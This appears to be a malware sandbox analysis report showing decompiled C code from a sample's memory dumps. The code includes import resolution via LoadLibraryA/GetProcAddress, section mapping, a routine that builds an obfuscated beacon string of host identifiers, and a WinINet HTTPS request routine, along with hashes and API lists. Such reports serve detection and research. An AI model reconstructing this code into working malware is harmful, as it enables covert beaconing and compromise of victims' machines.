Associated: 00000011.00000002.525835370.00000000001A4000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.525846743.00000000001A6000.00000040.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: a0432050cf41c84421b6c7dc0a27d288bc4abc767ba214151e892c20fd89f3a1
Instruction ID: 8b81cc05b5a4ac7840cc68a87ec53495cb5c24b8b72922ca99ea2f4782483c57
Opcode Fuzzy Hash: a0432050cf41c84421b6c7dc0a27d288bc4abc767ba214151e892c20fd89f3a1
Instruction Fuzzy Hash: 3D21DBB5D0020DAFDB11DFE9C8849DEFBB9EB48354F108469E515F7210D7359A448B64

Uniqueness

Uniqueness Score: -1.00%

Function 001A1264, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001A1264(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x1a3100;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x001a1264
0x001a126d
0x001a1272
0x001a1278
0x001a1281
0x001a1287
0x001a1289
0x001a128c
0x001a1291
0x001a1298
0x001a1298
0x001a129c
0x001a12a2
0x001a12a7
0x00000000
0x00000000
0x001a12ad
0x001a12b7
0x001a12b9
0x001a12bc
0x001a12bf
0x001a12c3
0x001a12cb
0x001a12cd
0x001a12d0
0x001a1338
0x001a1338
0x001a133c
0x00000000
0x00000000
0x001a12d5
0x001a12db
0x001a12dd
0x001a12f0
0x001a12f3
0x001a12f3
0x001a12f3
0x001a12f7
0x001a12df
0x001a12df
0x001a12e7
0x001a12e9
0x00000000
0x00000000
0x00000000
0x00000000
0x001a12e9
0x001a12d7
0x001a12d7
0x001a12eb
0x001a12eb
0x001a12eb
0x001a12fa
0x001a12fd
0x001a12ff
0x001a1306
0x001a1301
0x001a1301
0x001a1301
0x001a130e
0x001a1314
0x001a1316
0x001a1346
0x001a1318
0x001a1318
0x001a131b
0x001a131d
0x001a1325
0x001a1325
0x001a132a
0x001a132c
0x001a1333
0x001a1335
0x001a1335
0x001a1335
0x00000000
0x001a1335
0x00000000
0x001a1316
0x001a12c5
0x001a12c5
0x001a12c9
0x00000000
0x00000000
0x001a12c9
0x001a1349
0x001a1349
0x001a1350
0x001a1355
0x00000000
0x00000000
0x001a135b
0x001a1366
0x00000000
0x001a1366
0x001a135d
0x001a135d
0x001a1363
0x00000000
0x001a1363
0x001a1291
0x001a1367
0x001a136c

APIs

LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 001A129C
GetProcAddress.KERNEL32(?,00000000), ref: 001A130E

Memory Dump Source

Source File: 00000011.00000002.525816570.00000000001A1000.00000040.00020000.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000011.00000002.525798200.00000000001A0000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.525835370.00000000001A4000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.525846743.00000000001A6000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: f75d75ff346347c2ade5ef69c2f436f0090648b9f05dd6f01538813faa386e38
Instruction ID: 061fc57c0e3a3d9f5ce12401494ce122d86a434b8fc800f05a89f28357b7777c
Opcode Fuzzy Hash: f75d75ff346347c2ade5ef69c2f436f0090648b9f05dd6f01538813faa386e38
Instruction Fuzzy Hash: E2311679A00206EBDB14CF99C890ABEB7F5BF06361F25446AD901EB240E770EA40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001A1703, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E001A1703(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x001a1715
0x001a171b
0x001a1729
0x001a1730
0x001a1735
0x001a173b
0x00000000
0x001a173c
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,001A1D02,00000002,00000000,?,?,00000000,?,?,001A1D02,00000002), ref: 001A1730

Memory Dump Source

Source File: 00000011.00000002.525816570.00000000001A1000.00000040.00020000.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000011.00000002.525798200.00000000001A0000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.525835370.00000000001A4000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.525846743.00000000001A6000.00000040.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 70d5cbb84dd766a701b278710e446affe64f05377c6bc6c9395a1583c1c5ad76
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 31F012B590020CBFDB119FA5CC85CAFBBBDEB44394F104939F152E6090D6309E489A60

Uniqueness

Uniqueness Score: -1.00%

Function 02CE9BF1, Relevance: 34.7, APIs: 23, Instructions: 201
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E02CE9BF1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				void* _t38;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x2ced018; // 0x98333b35
				asm("bswap eax");
				_t27 =  *0x2ced014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x2ced010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0x2ced00c; // 0x62819102
				asm("bswap eax");
				_t30 =  *0x2ced2a8; // 0xeba5a8
				_t3 = _t30 + 0x2cee633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d163, _t29, _t28, _t27, _t26,  *0x2ced02c,  *0x2ced004, _t25);
				_t33 = E02CE3288();
				_t34 =  *0x2ced2a8; // 0xeba5a8
				_t4 = _t34 + 0x2cee673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37; // executed
				_t38 = E02CE831C(_t91); // executed
				_t96 = _t38;
				if(_t96 != 0) {
					_t83 =  *0x2ced2a8; // 0xeba5a8
					_t6 = _t83 + 0x2cee8d4; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x2ced238, 0, _t96);
				}
				_t97 = E02CE9267();
				if(_t97 != 0) {
					_t78 =  *0x2ced2a8; // 0xeba5a8
					_t8 = _t78 + 0x2cee8dc; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x2ced238, 0, _t97);
				}
				_t98 =  *0x2ced32c; // 0x3ba95b0
				_a32 = E02CE284E(0x2ced00a, _t98 + 4);
				_t42 =  *0x2ced2d0; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x2ced2a8; // 0xeba5a8
					_t11 = _t74 + 0x2cee8b6; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x2ced2cc; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x2ced2a8; // 0xeba5a8
					_t13 = _t71 + 0x2cee88d; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x2ced238, 0, 0x800);
					if(_t100 != 0) {
						E02CE3239(GetTickCount());
						_t50 =  *0x2ced32c; // 0x3ba95b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x2ced32c; // 0x3ba95b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x2ced32c; // 0x3ba95b0
						_t103 = E02CE7B8D(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x2cec28c);
							_push(_t103);
							_t62 = E02CEA677();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E02CE933A(0xffffffffffffffff, _t100, _v28, _v24); // executed
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E02CE5433();
								}
								HeapFree( *0x2ced238, 0, _v44);
							}
							HeapFree( *0x2ced238, 0, _t103);
						}
						HeapFree( *0x2ced238, 0, _t100);
					}
					HeapFree( *0x2ced238, 0, _a24);
				}
				HeapFree( *0x2ced238, 0, _t105);
				return _a12;
			}

0x02ce9bf1
0x02ce9bf1
0x02ce9bf1
0x02ce9bf6
0x02ce9bfc
0x02ce9c06
0x02ce9c08
0x02ce9c08
0x02ce9c15
0x02ce9c20
0x02ce9c23
0x02ce9c2e
0x02ce9c31
0x02ce9c36
0x02ce9c39
0x02ce9c3e
0x02ce9c41
0x02ce9c4d
0x02ce9c5a
0x02ce9c5c
0x02ce9c62
0x02ce9c67
0x02ce9c72
0x02ce9c74
0x02ce9c77
0x02ce9c79
0x02ce9c7e
0x02ce9c82
0x02ce9c84
0x02ce9c89
0x02ce9c95
0x02ce9c97
0x02ce9ca3
0x02ce9ca5
0x02ce9ca5
0x02ce9cb0
0x02ce9cb4
0x02ce9cb6
0x02ce9cbb
0x02ce9cc7
0x02ce9cc9
0x02ce9cd5
0x02ce9cd7
0x02ce9cd7
0x02ce9cdd
0x02ce9cf0
0x02ce9cf4
0x02ce9cfb
0x02ce9cfe
0x02ce9d03
0x02ce9d0e
0x02ce9d10
0x02ce9d13
0x02ce9d13
0x02ce9d15
0x02ce9d1c
0x02ce9d1f
0x02ce9d24
0x02ce9d2e
0x02ce9d30
0x02ce9d38
0x02ce9d51
0x02ce9d55
0x02ce9d61
0x02ce9d66
0x02ce9d6f
0x02ce9d80
0x02ce9d84
0x02ce9d8d
0x02ce9d93
0x02ce9da0
0x02ce9dad
0x02ce9db3
0x02ce9dbf
0x02ce9dc5
0x02ce9dc6
0x02ce9dcb
0x02ce9dd1
0x02ce9dd7
0x02ce9dde
0x02ce9de5
0x02ce9deb
0x02ce9df2
0x02ce9df6
0x02ce9e01
0x02ce9e06
0x02ce9e0c
0x02ce9e15
0x02ce9e15
0x02ce9e26
0x02ce9e26
0x02ce9e35
0x02ce9e35
0x02ce9e44
0x02ce9e44
0x02ce9e56
0x02ce9e56
0x02ce9e65
0x02ce9e76

APIs

GetTickCount.KERNEL32 ref: 02CE9C08
wsprintfA.USER32 ref: 02CE9C55
wsprintfA.USER32 ref: 02CE9C72
wsprintfA.USER32 ref: 02CE9C95
HeapFree.KERNEL32(00000000,00000000), ref: 02CE9CA5
wsprintfA.USER32 ref: 02CE9CC7
HeapFree.KERNEL32(00000000,00000000), ref: 02CE9CD7
wsprintfA.USER32 ref: 02CE9D0E
wsprintfA.USER32 ref: 02CE9D2E
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02CE9D4B
GetTickCount.KERNEL32 ref: 02CE9D5B
RtlEnterCriticalSection.NTDLL(03BA9570), ref: 02CE9D6F
RtlLeaveCriticalSection.NTDLL(03BA9570), ref: 02CE9D8D

Part of subcall function 02CE7B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,73FCC740,?,?,02CE9DA0,?,03BA95B0), ref: 02CE7BB8
Part of subcall function 02CE7B8D: lstrlen.KERNEL32(?,?,?,02CE9DA0,?,03BA95B0), ref: 02CE7BC0
Part of subcall function 02CE7B8D: strcpy.NTDLL ref: 02CE7BD7
Part of subcall function 02CE7B8D: lstrcat.KERNEL32(00000000,?), ref: 02CE7BE2
Part of subcall function 02CE7B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02CE9DA0,?,03BA95B0), ref: 02CE7BFF

StrTrimA.SHLWAPI(00000000,02CEC28C,?,03BA95B0), ref: 02CE9DBF

Part of subcall function 02CEA677: lstrlen.KERNEL32(03BA9B78,00000000,00000000,73FCC740,02CE9DCB,00000000), ref: 02CEA687
Part of subcall function 02CEA677: lstrlen.KERNEL32(?), ref: 02CEA68F
Part of subcall function 02CEA677: lstrcpy.KERNEL32(00000000,03BA9B78), ref: 02CEA6A3
Part of subcall function 02CEA677: lstrcat.KERNEL32(00000000,?), ref: 02CEA6AE

lstrcpy.KERNEL32(00000000,?), ref: 02CE9DDE
lstrcpy.KERNEL32(00000000,00000000), ref: 02CE9DE5
lstrcat.KERNEL32(00000000,?), ref: 02CE9DF2
lstrcat.KERNEL32(00000000,00000000), ref: 02CE9DF6

Part of subcall function 02CE933A: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,76D681D0), ref: 02CE93EC

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 02CE9E26
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02CE9E35
HeapFree.KERNEL32(00000000,00000000,?,03BA95B0), ref: 02CE9E44
HeapFree.KERNEL32(00000000,00000000), ref: 02CE9E56
HeapFree.KERNEL32(00000000,?), ref: 02CE9E65

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
String ID:
API String ID: 3080378247-0
Opcode ID: ea27a2e72117d9b2e8d05764ba05a290eba59ceaa11bf3121ee229be754a124e
Instruction ID: 1dd00c61f1ce9b190eda4e64685b85ae8fd322452449d8c76ec097d2141405b7
Opcode Fuzzy Hash: ea27a2e72117d9b2e8d05764ba05a290eba59ceaa11bf3121ee229be754a124e
Instruction Fuzzy Hash: 7561C072980201EFCF11AB64EC48F5A77ECEB48354F050A15FA0BDF260D735EA259BA5

Uniqueness

Uniqueness Score: -1.00%

Function 02CEA85C, Relevance: 19.6, APIs: 13, Instructions: 126
networkstringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E02CEA85C(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E02CE1525(__eax + __eax + 1);
				if(_t56 != 0) {
					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E02CE8B22(_t56);
					} else {
						E02CE8B22( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E02CEA7F1) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x1bb, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E02CE29C0( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x2ced2a8; // 0xeba5a8
						_t15 = _t59 + 0x2cee743; // 0x544547
						_v8 = 0x84c03180;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84c03180, _t65);
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}

0x02cea85c
0x02cea85c
0x02cea867
0x02cea86e
0x02cea876
0x02cea880
0x02cea886
0x02cea899
0x02cea8a9
0x02cea89b
0x02cea89e
0x02cea8a3
0x02cea8a3
0x02cea899
0x02cea8b9
0x02cea8bf
0x02cea8c4
0x02cea9b0
0x00000000
0x02cea8df
0x02cea8e2
0x02cea8f8
0x02cea8fe
0x02cea903
0x02cea92b
0x02cea93e
0x02cea948
0x02cea94b
0x02cea951
0x02cea956
0x00000000
0x00000000
0x02cea95a
0x02cea966
0x02cea977
0x02cea979
0x02cea98a
0x02cea98a
0x02cea99a
0x00000000
0x02cea9ac
0x00000000
0x02cea9ac
0x00000000
0x00000000
0x00000000
0x02cea903

APIs

lstrlen.KERNEL32(?,00000008,76D24D40), ref: 02CEA86E

Part of subcall function 02CE1525: RtlAllocateHeap.NTDLL(00000000,00000000,02CE1278), ref: 02CE1531

InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 02CEA891
InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 02CEA8B9
InternetSetStatusCallback.WININET(00000000,02CEA7F1), ref: 02CEA8D0
ResetEvent.KERNEL32(?), ref: 02CEA8E2
InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,00000000,?), ref: 02CEA8F8
GetLastError.KERNEL32 ref: 02CEA905
HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84C03180,?), ref: 02CEA94B
InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 02CEA969
InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 02CEA98A
InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 02CEA996
InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 02CEA9A6
GetLastError.KERNEL32 ref: 02CEA9B0

Part of subcall function 02CE8B22: HeapFree.KERNEL32(00000000,00000000,02CE131A,00000000,?,?,00000000), ref: 02CE8B2E

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
String ID:
API String ID: 2290446683-0
Opcode ID: 723c65b9ead22d4e0324a1759a7dacac7f4eea19e703fff80dd580d03560bf4a
Instruction ID: e32d669e0df3b6530b8e03e7b139ac84ba06b607b6803a15fd4a9c6baabd3a58
Opcode Fuzzy Hash: 723c65b9ead22d4e0324a1759a7dacac7f4eea19e703fff80dd580d03560bf4a
Instruction Fuzzy Hash: 47418C71940204BFDF319FA1DC88F9B7BBDEB88714B110A29F643D6090E731A614CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02CEAC95, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E02CEAC95(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x2ce0000;
				_t115 = _t139[3] + 0x2ce0000;
				_t131 = _t139[4] + 0x2ce0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x2ce0000;
				_v16 = _t139[5] + 0x2ce0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x2ce0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x2ced1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x2ced1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x2ced1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x2ced19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x2ced1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x2ced198; // 0x0
										 *_t102 = _t125;
										 *0x2ced198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x2ced19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x02ceaca4
0x02ceacba
0x02ceacc0
0x02ceacc2
0x02ceacc7
0x02ceaccd
0x02ceacd2
0x02ceacd5
0x02ceace3
0x02ceacea
0x02ceaced
0x02ceacf0
0x02ceacf1
0x02ceacf4
0x02ceacf7
0x02ceacfa
0x02ceacff
0x02cead0e
0x00000000
0x02cead14
0x02cead1e
0x02cead28
0x02cead2d
0x02cead2f
0x02cead39
0x02cead3c
0x02cead3f
0x02cead45
0x02cead47
0x02cead47
0x02cead4a
0x02cead4d
0x02cead52
0x02cead56
0x02cead69
0x02cead6b
0x02ceae13
0x02ceae13
0x02ceae1a
0x02ceae1d
0x02ceae27
0x02ceae27
0x02ceae2b
0x02ceaea9
0x02ceaeac
0x02ceaeae
0x02ceaeae
0x02ceaeb5
0x02ceaeb7
0x02ceaec1
0x02ceaec4
0x02ceaec7
0x02ceaec7
0x00000000
0x02ceae2d
0x02ceae30
0x02ceae5e
0x02ceae68
0x02ceae6c
0x02ceae74
0x02ceae77
0x02ceae7e
0x02ceae88
0x02ceae88
0x02ceae8c
0x02ceae91
0x02ceaea0
0x02ceaea6
0x02ceaea6
0x02ceae8c
0x00000000
0x02ceae37
0x02ceae3a
0x02ceae42
0x02ceae57
0x02ceae5c
0x00000000
0x00000000
0x02ceae5c
0x00000000
0x02ceae42
0x02ceae30
0x02ceae2b
0x02cead71
0x02cead78
0x02cead88
0x02cead8b
0x02cead91
0x02cead95
0x02ceadd8
0x02ceade4
0x02ceae0d
0x02ceade6
0x02ceadea
0x02ceadf0
0x02ceadf8
0x02ceadfa
